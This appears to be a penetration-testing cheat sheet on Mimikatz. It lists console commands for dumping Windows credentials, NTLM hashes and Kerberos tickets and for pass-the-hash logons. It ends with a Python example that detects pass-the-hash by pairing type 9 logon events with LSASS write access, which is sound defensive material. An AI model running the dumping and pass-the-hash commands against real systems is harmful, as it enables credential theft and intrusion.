Mimikatz

password_attacks

mimikatz (18.4k ⭐) is the most popular tool to dump Windows credentials or perform attacks such as Pass-the-hash/Pass-the-ticket.

PS> .\mimikatz.exe
mimikatz# privilege::debug
mimikatz# # run commands
mimikatz# exit

To dump credentials, hashes, tickets, etc. you can use:

mimikatz# sekurlsa::logonPasswords full
mimikatz# sekurlsa::ekeys           # dump rc4+ntlm hashes
mimikatz# sekurlsa::tickets /export # dump tickets
mimikatz# lsadump:: # list the commands available in the lsadump module
mimikatz# lsadump::sam
mimikatz# lsadump::lsa

To perform a pass-the-hash attack using an RC4 or NTLM hash:

mimikatz# sekurlsa::pth /user:xxx /rc4:XXX /domain:xxx.yyy
mimikatz# sekurlsa::pth /user:xxx /rc4:XXX /domain:xxx.yyy /run:cmd.exe
mimikatz# sekurlsa::pth /user:xxx /ntlm:XXX /domain:xxx.yyy /run:cmd.exe
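On the detection side, sekurlsa::pth typically leaves a logon type 9 (NewCredentials) event 4624 from the seclogo logon process, together with a write-access handle to lsass.exe that Sysmon records as event 10. The following is an added example, not part of the original page: it pairs the two signals per host. The sample records are constructed and the 30-second window is an assumption.

```python
from datetime import datetime, timedelta

# Constructed sample records (not real logs), using field names from
# Windows Security event 4624 and Sysmon event 10 (ProcessAccess).
EVENTS = [
    {"id": 4624, "time": "2024-05-01T10:00:05", "host": "WS01", "LogonType": 2,
     "LogonProcessName": "User32", "TargetUserName": "alice"},
    {"id": 4624, "time": "2024-05-01T10:15:00", "host": "WS01", "LogonType": 9,
     "LogonProcessName": "seclogo", "TargetUserName": "alice"},
    {"id": 10, "time": "2024-05-01T10:15:01", "host": "WS01",
     "SourceImage": r"C:\Users\alice\tool.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1038"},
    # Type 9 logon with no LSASS write nearby, e.g. a plain "runas /netonly"
    {"id": 4624, "time": "2024-05-01T11:30:00", "host": "WS02", "LogonType": 9,
     "LogonProcessName": "seclogo", "TargetUserName": "bob"},
    # Query-only handle to LSASS: no write bit set
    {"id": 10, "time": "2024-05-01T12:00:00", "host": "WS03",
     "SourceImage": r"C:\Windows\System32\svchost.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1000"},
]

PROCESS_VM_WRITE = 0x0020  # access right required to write into LSASS memory


def is_newcredentials_logon(ev):
    """Event 4624 with logon type 9 issued through the seclogo logon process."""
    return (ev["id"] == 4624 and ev.get("LogonType") == 9
            and ev.get("LogonProcessName", "").strip().lower() == "seclogo")


def is_lsass_write(ev):
    """Sysmon event 10 where a process opened lsass.exe with write access."""
    mask = int(ev.get("GrantedAccess", "0x0"), 16)
    return (ev["id"] == 10 and (mask & PROCESS_VM_WRITE) != 0
            and ev.get("TargetImage", "").lower().endswith("\\lsass.exe"))


def find_pth_candidates(events, window=timedelta(seconds=30)):
    """Pair each type 9 logon with an LSASS write on the same host within `window`."""
    writes = [e for e in events if is_lsass_write(e)]
    hits = []
    for logon in filter(is_newcredentials_logon, events):
        t = datetime.fromisoformat(logon["time"])
        for w in writes:
            delta = abs(datetime.fromisoformat(w["time"]) - t)
            if w["host"] == logon["host"] and delta <= window:
                hits.append((logon["host"], logon["TargetUserName"], w["SourceImage"]))
    return hits
```

A type 9 logon on its own is also produced by legitimate runas /netonly use, which is why the example requires the LSASS write on the same host before flagging.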